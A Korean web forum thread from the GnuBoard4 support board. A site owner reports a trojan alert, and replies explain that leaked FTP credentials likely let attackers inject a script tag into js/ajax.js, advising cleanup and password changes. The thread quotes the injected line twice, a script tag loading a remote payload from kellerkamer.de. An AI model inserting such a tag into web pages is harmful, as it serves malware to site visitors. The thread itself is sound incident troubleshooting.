이전
목록
다음

그누보드 head.sub.php 에 악성코드가...

클릭전쟁
프로필 보기이 회원 글보기이 회원의 댓글보기
 · 16년 전 · 1668 · 7
웹사이트 상에서 트로이목마 바이러스가 검출되어 해당 페이지 소스를 열어보니..
아래와 같이 <script src=http://kellerkamer.de/images/impressum.php ></script>
소스가 들어 있더라고요.

그래서
그누보드 head.sub.php 에 악성코드가... 있는것 같아 열어보니...
그 페이지에는 해당 코드가 없는데...


어떻게 된건가요?.. ㅡㅡ;
악성코드 때문에 돌아가실 지경입니다. 해결하신 분들의 도움 바래요.
글 검색해 보니... 사이트 경로만 틀리지 질문 올리신 분들은 꽤 되시던데... 해결방법이 없네요.
도와주세요
|

댓글 7개

MMSTUDIO
프로필 보기이 회원 글보기이 회원의 댓글보기
 16년 전
일단 클릭 전쟁님 사용하시는 컴퓨터 바이러스검사부터 하시길 바랍니다.
클릭 전쟁님 컴퓨터에 바이러스가 걸려서 그런 것입니다. ^^;;
라엘
프로필 보기이 회원 글보기이 회원의 댓글보기
 16년 전
여러경우가 있는데 간혹 서버의 네트워크 단에서 이루어 지는 경우도 있습니다.

다른 서버가 질문자님의 서버의 패킷을 읽어서 적절한 위치에 스크립트를 추가해서 재전송하는거죠.


임시방편으로 (되려나)

</script><!--
--><body topmargin ..

주석처리해보심이;;
내가내
프로필 보기이 회원 글보기이 회원의 댓글보기
 16년 전
ftp 정보가 누설되어 있는 경우 일수도 있습니다.

님이 모르시는 <script> 파일들을 모두 찾아서 지우시고...

ftp 정보 변경을 해보시는게 좋을거 같습니다.

저같은 경우는 지워도 지워도 계속 생겨 나드라구요.. 즉 ftp 정보가 노출 됐다는거죠~~

그러니깐 제가 알려 주시는 데로 해보세요~~
흑괭이
프로필 보기이 회원 글보기이 회원의 댓글보기
 16년 전
서버의 악성코드 점검이 먼저 필요합니다. 만약 서버가 깨끗하다면 님의 FTP 계정정보가 유출되었습니다. 비번 변경후 ftp 접속시 sftp를 사용하세요.
오누리
프로필 보기이 회원 글보기이 회원의 댓글보기
 16년 전
일단 현재 사용중인 컴퓨터를 바이러스 검사를 하셔서 악성코드 및 바이러스를 제거 하신 다음, 위 계정에 변조된 파일을 복구하세요. (index.php 파일이란 파일은 모두 확인하세요.) 하신 다음 ftp 및 db등의 비밀번호를 변경하시길 바랍니다.
미래나무
프로필 보기이 회원 글보기이 회원의 댓글보기
 16년 전
js/ajax.js에 보시면
<script src=http://kellerkamer.de/images/impressum.php ></script>
가 있을겁니다. 지우세요.

저도 당해봤습니다 하하하
클릭전쟁
프로필 보기이 회원 글보기이 회원의 댓글보기
 16년 전
감사합니다. 알려주신데로 우선 처리해 봐야겠습니다. ㅡㅡ;
댓글을 작성하시려면 로그인이 필요합니다.

그누4 질문답변

그누보드4 관련 질문은 QA 로 이전됩니다. QA 그누보드4 바로가기 기존 게시물은 열람만 가능합니다.

+
제목 글쓴이 날짜 조회
16년 전 조회 935
16년 전 조회 972
16년 전 조회 872
16년 전 조회 1,217
16년 전 조회 1,557
16년 전 조회 1,012
16년 전 조회 851
16년 전 조회 1,314
16년 전 조회 874
16년 전 조회 1,669
16년 전 조회 1,626
16년 전 조회 1,543
16년 전 조회 1,074
16년 전 조회 935
16년 전 조회 1,948
16년 전 조회 816
16년 전 조회 970
16년 전 조회 814
16년 전 조회 1,254
16년 전 조회 1,029
이전 첫 페이지 다음
글쓰기